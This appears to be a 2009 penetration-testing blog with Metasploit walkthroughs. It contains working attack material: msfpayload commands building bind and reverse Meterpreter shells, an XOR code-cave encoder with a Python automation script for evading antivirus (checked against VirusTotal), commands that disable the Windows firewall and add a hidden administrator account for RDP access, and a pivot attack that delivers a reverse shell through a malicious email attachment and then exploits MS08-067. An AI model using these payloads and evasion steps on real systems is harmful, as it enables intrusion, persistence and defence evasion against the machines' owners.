Saturday, May 23, 2009

Metasploit daemon - msfd II


This plugin provides an msf daemon interface that spawns a listener on a
defined port (default 55554) and gives each connecting client its own
console interface. These consoles all share the same framework instance.

link:
http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb

Friday, May 22, 2009

Metasploit daemon - msfd I


Utility that opens the Metasploit framework to remote access: it turns the framework on the local machine into a server that remote machines connect to. A client that connects gets a console running with the privileges of the user who started msfd, so keep it on loopback unless the address given with -a is reachable only by people you trust.

Location:
/pentest/exploit/framework3

Usage:
./msfd -a -d -p

Example:
./msfd -a 192.168.1.100 -d -p 4444
[*] Initializing MSFD ...
[*] Running MSFD ...

links:
https://wiki.remote-exploit.org/backtrack/wiki/msfd
http://trac.metasploit.com/browser/framework3/trunk/msfd

Thursday, May 21, 2009

Metasploit keylogging

Saturday, May 16, 2009

Msfencode + XOR encoding ==> 15%

File encodedbindtcpx.exe received 2009.05.16 11:23:28 p.m. (CET)
Current status: finished
Result: 6/40 (15.00%)

http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482


Friday, May 15, 2009

msfencode vs XOR encryption

Three builds of the same bind shell, scanned on VirusTotal:

./msfpayload windows/shell_bind_tcp LPORT=55555 X > ***.exe

File bindtcpx.exe received 2009.05.15 8:33:46 p.m. (PST)
Current status: finished
Result: 12/40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49

--------------------------
Execution flow hijack ==> XOR encryption

File bindtcpx1.exe received 2009.05.15 8:35:25 p.m. (PST)
Current status: finished
Result: 8/40 (20.00%)
http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231

--------------------------
./msfpayload windows/shell_bind_tcp LPORT=55555 R | ./msfencode -b '' -t exe -o ***.exe

File encodedbindtcp.exe received 2009.05.16 11:33:49 p.m. (CET)
Current status: finished
Result: 10/40 (25.00%)
http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e


Execution flow hijack + XOR encryption



*** Based on the demo given by muts at ShmooCon ***

BackTrack:
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe

Windows:
double-click the file ==> bind shell on port 55555
check: netstat -na | find "55555"


PEditor:
.idata: vsize: 500 - rsize: 400

hexedit:
+200 (hex) bytes


--------------
- OllyDbg -
--------------

first instructions:
00401000 >  31C0           XOR EAX,EAX
00401002    68 34104000    PUSH 00401034
00401007    64:FF30        PUSH DWORD PTR FS:[EAX]
0040100A    64:8920        MOV DWORD PTR FS:[EAX],ESP
0040100D    6A 40          PUSH 40

Code cave: 00401066
start:     00401002
end:       00401060

XOR loop:
MOV EAX, 00401002           # start address of the encoded range
XOR BYTE PTR DS:[EAX], 5E   # XOR the byte EAX points to with the key 5E
INC EAX                     # next byte
CMP EAX, 00401060           # reached the end of the encoded range?
JLE SHORT xxx               # if not, jump back to the XOR instruction


After the loop:
XOR EAX,EAX    (the overwritten instruction)
JMP 00401002   (the address right after the overwritten instruction)


------------------
Comments
------------------


1 - Create a bind_tcp payload
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe (for example)

2 - Scan it with VirusTotal (result ...)
3 - Double-click the payload and verify that the port is open
netstat -na | find "55555"

4 - Open the payload in PEditor
- Modify the .idata section:
  vsize: 500 & rsize: 400
  It must be readable, writable and executable.
- Modify the .text section (readable, writable and executable)
  Save
The write permission matters: the loop decodes in place with XOR BYTE PTR DS:[EAX], and a section that is not writable faults on the first write.

5 - Open the payload with Hexedit
Append 200 bytes (hex)
Since initial rsize = 200 and new rsize = 400, 400 - 200 ==> 200. Save.


6 - Open the payload in OllyDbg
- First copy the instructions into Notepad (to keep track of the instructions that will be replaced)
- Find space for a "code cave"
- Back at the OEP (entry point), replace the first instruction with "JMP address-of-code-cave"
- Pick the address at which encoding must start
- Pick the address at which encoding must end, and edit the loop ASM with these addresses
- After the loop, insert the instruction(s) that the initial JMP replaced
- Finish with a JMP to the address (00401002) that follows the replaced instruction

Two things to check while doing this:
- 00401066 is within 127 bytes of the entry point, so the jump assembles as a 2-byte JMP SHORT and replaces exactly the 2-byte XOR EAX,EAX. A cave further away needs a 5-byte near JMP, which also clobbers the PUSH 00401034 that follows; the stub must then replay both instructions and resume at 00401007.
- Neither the entry jump (00401000-00401001) nor the cave (from 00401066) may fall inside the encoded range 00401002-00401060, or the loop will XOR its own code.

Then run the loop once in the debugger (breakpoint on the XOR EAX,EAX after it, F9): the bytes between 00401002 and 00401060 are now XORed in memory. Save them to the file (right-click > Copy to executable > All modifications, then Save file). XOR with a fixed key is its own inverse, so the same loop decodes the payload at run time before control reaches 00401002.
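The six steps above, automated on a byte image of the code section as an added example (this is not code from the post or from muts' demo): it writes the JMP SHORT at the entry point, assembles the post's decoder stub into the cave at 00401066, XORs 00401002-00401060 once with key 5E, and then runs a tiny interpreter for the stub's opcodes to confirm that the encoded bytes come back and control arrives at 00401002. The sample image is constructed: the first fifteen bytes are the OllyDbg listing above, the rest is filler standing in for the payload. Assumed: the image is the .text section as mapped at 00401000 and already marked writable (step 4); on a real file you would map these addresses to file offsets with the section's VirtualAddress and PointerToRawData first.

```python
import struct

ENTRY     = 0x401000   # OEP: XOR EAX,EAX (2 bytes)
CAVE      = 0x401066   # free space after the payload
ENC_START = 0x401002   # first byte XORed
ENC_END   = 0x401060   # last byte XORed (inclusive: CMP EAX,end / JLE)
KEY       = 0x5E

# First instructions from the post's OllyDbg listing; the rest of the
# constructed sample image is filler standing in for the payload body.
TEMPLATE_HEAD = bytes.fromhex("31C0 6834104000 64FF30 648920 6A40")

def sample_image(size=0x80):
    filler = bytes((i * 37 + 11) & 0xFF for i in range(size - len(TEMPLATE_HEAD)))
    return TEMPLATE_HEAD + filler

def rel8(next_ip, target):
    """Displacement for a short jump whose following instruction is at next_ip."""
    d = target - next_ip
    if not -128 <= d <= 127:
        raise ValueError("short jump out of range: use a 5-byte near JMP")
    return struct.pack("<b", d)

def build_stub(cave, start, end, key, replaced, resume):
    """Decoder stub, byte for byte what the post assembles in the cave."""
    stub = b"\xB8" + struct.pack("<I", start)              # MOV EAX, start
    loop = cave + len(stub)                                # JLE target
    stub += b"\x80\x30" + bytes([key])                     # XOR BYTE PTR [EAX], key
    stub += b"\x40"                                        # INC EAX
    stub += b"\x3D" + struct.pack("<I", end)               # CMP EAX, end
    stub += b"\x7E" + rel8(cave + len(stub) + 2, loop)     # JLE SHORT loop
    stub += replaced                                       # instruction(s) the entry JMP overwrote
    stub += b"\xE9" + struct.pack("<i", resume - (cave + len(stub) + 5))  # JMP resume
    return stub

def patch(image, base):
    """Hijack the entry point, plant the stub and encode the range once."""
    img = bytearray(image)
    off = lambda a: a - base
    replaced = bytes(img[off(ENTRY):off(ENTRY) + 2])      # 31 C0  XOR EAX,EAX
    stub = build_stub(CAVE, ENC_START, ENC_END, KEY, replaced, ENC_START)
    # Neither the entry JMP nor the stub may lie inside the encoded range,
    # otherwise the loop XORs its own code.
    assert ENTRY + 2 <= ENC_START
    assert CAVE > ENC_END or CAVE + len(stub) <= ENC_START
    img[off(ENTRY):off(ENTRY) + 2] = b"\xEB" + rel8(ENTRY + 2, CAVE)  # JMP SHORT cave
    img[off(CAVE):off(CAVE) + len(stub)] = stub
    for a in range(ENC_START, ENC_END + 1):   # same inclusive range the loop decodes
        img[off(a)] ^= KEY
    return bytes(img)

def run_decoder(image, base, pc, max_steps=5000):
    """Interpret just the opcodes the stub uses; return (eip, memory) as soon
    as an instruction outside that set is reached, i.e. the decoded payload."""
    mem = bytearray(image)
    eax, zf, sf, of = 0, False, False, False
    u8  = lambda a: mem[a - base]
    s8  = lambda a: struct.unpack("<b", bytes([mem[a - base]]))[0]
    u32 = lambda a: struct.unpack("<I", bytes(mem[a - base:a - base + 4]))[0]
    s32 = lambda a: struct.unpack("<i", bytes(mem[a - base:a - base + 4]))[0]
    for _ in range(max_steps):
        op = u8(pc)
        if op == 0xEB:                                      # JMP SHORT rel8
            pc += 2 + s8(pc + 1)
        elif op == 0xE9:                                    # JMP rel32
            pc += 5 + s32(pc + 1)
        elif op == 0xB8:                                    # MOV EAX, imm32
            eax = u32(pc + 1); pc += 5
        elif op == 0x80 and u8(pc + 1) == 0x30:             # XOR BYTE PTR [EAX], imm8
            mem[eax - base] ^= u8(pc + 2); pc += 3
        elif op == 0x40:                                    # INC EAX
            eax = (eax + 1) & 0xFFFFFFFF; pc += 1
        elif op == 0x3D:                                    # CMP EAX, imm32
            imm = u32(pc + 1); r = (eax - imm) & 0xFFFFFFFF
            zf, sf = r == 0, bool(r >> 31)
            of = bool(((eax ^ imm) & (eax ^ r)) >> 31); pc += 5
        elif op == 0x7E:                                    # JLE SHORT rel8
            d = s8(pc + 1); pc += 2
            if zf or sf != of:
                pc += d
        elif op == 0x31 and u8(pc + 1) == 0xC0:             # XOR EAX,EAX
            eax = 0; pc += 2
        else:
            return pc, bytes(mem)
    raise RuntimeError("decoder loop did not terminate")

def demo():
    """Patch the sample, run the stub, report where it resumes and whether
    the encoded range was restored to the original bytes."""
    original = sample_image()
    patched = patch(original, ENTRY)
    eip, mem = run_decoder(patched, ENTRY, ENTRY)
    lo, hi = ENC_START - ENTRY, ENC_END - ENTRY + 1
    return eip, mem[lo:hi] == original[lo:hi]

if __name__ == "__main__":
    eip, restored = demo()
    print("resumes at %#x, payload restored: %s" % (eip, restored))
```

Run it as a script to see the resume address. build_stub takes any cave, range and key, and rel8 refuses a cave that is too far for a short jump, which is exactly the case where the entry needs a 5-byte near JMP and the stub has to replay more than one instruction.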

Sunday, May 3, 2009

Meterpreter Autoscript scraper.rb


scraper.rb on metasploit [dot] com


http://trac.metasploit.com/wiki/AutomatingMeterpreter

Remote desktop configuration




Getgui script:

getgui.rb on metasploit
run getgui -h


manual config:

netstat -na | find "3389"
netsh firewall show opmode
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode exception=ENABLE
netsh firewall set service type=remotedesktop mode=enable
netsh firewall set service type=remotedesktop mode=enable scope=CUSTOM addresses=192.168.1.64
(mode=DISABLE switches the firewall off outright; the two "set service" lines are the narrower option, and scope=CUSTOM limits the RDP exception to the attacker's address)


reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" | find "fDenyTSConnections"

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user morpheus thematrix /add
net localgroup "Utilisateurs de Bureau à distance" morpheus /add
net localgroup Administrateurs morpheus /add
(the group names are those of a French Windows; on an English install they are "Remote Desktop Users" and Administrators)

Saturday, May 2, 2009

Meterpreter attack pivot [video]



----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
    NAT overload + static PAT (53, 69, 4444, 4445)
A:  192.168.1.8   BackTrack laptop (attacker)
----------------------------------------------
network 2
R2: NAT overload (firewall)
B:  192.168.1.67  XP SP2 desktop (target 1 - pivot)
C:  192.168.1.66  XP SP3 laptop (target 2)
----------------------------------------------
A ==wifi==> R1 --- *Internet* --- R2 ==wire==> B ==wire==> C
----------------------------------------------

----------------------------------------------
ATTACK 1 (B)

Send B a malicious file (a .doc with a VBA macro, a .pdf, a .jpg, etc., by email for example) that executes a reverse TCP payload. LHOST in the payload is R1's public address: the static PAT on 4444 forwards the callback to the handler on A.

msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X > reverse.exe
# for the demonstration the file was transferred with tftp
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
exploit
run reverse.exe on B ==> 1st Meterpreter session

----------------------------------------------
PIVOT CONFIGURATION on B

portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445
background
route add 192.168.1.66 255.255.255.255 1
# 1 is the session number
# The route sends all framework traffic for 192.168.1.66 through session 1;
# the portfwd additionally exposes C's port 445 on the attacker's 127.0.0.1:4445.

----------------------------------------------
ATTACK 2 (C)
use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set PAYLOAD windows/meterpreter/bind_tcp
set LPORT 4445
exploit
# 2nd Meterpreter session (the exploit and the connection to the bind shell both go through session 1)
